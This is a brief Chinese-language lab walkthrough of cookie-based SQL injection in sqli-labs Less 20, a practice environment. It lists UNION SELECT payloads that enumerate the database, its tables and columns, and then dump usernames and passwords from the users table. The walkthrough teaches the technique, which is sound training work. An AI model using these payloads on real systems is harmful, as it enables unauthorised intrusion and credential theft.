环境sqli-labs
less 20
1、在cookie里输入特殊字符报错
发现是单引号闭合
2、判断字段长度
order by 3正常,order by 4返回错误
3、union联合查询
a' union select 1,2,3 #
4、获取数据库名称
a' union select 1,2,database()#
5、获取表名
a' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'#
6、获取字段
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#
7、获取字段值
union select 1,2,group_concat(concat_ws('-',id,username,password)) from users#
禁止非法,后果自负
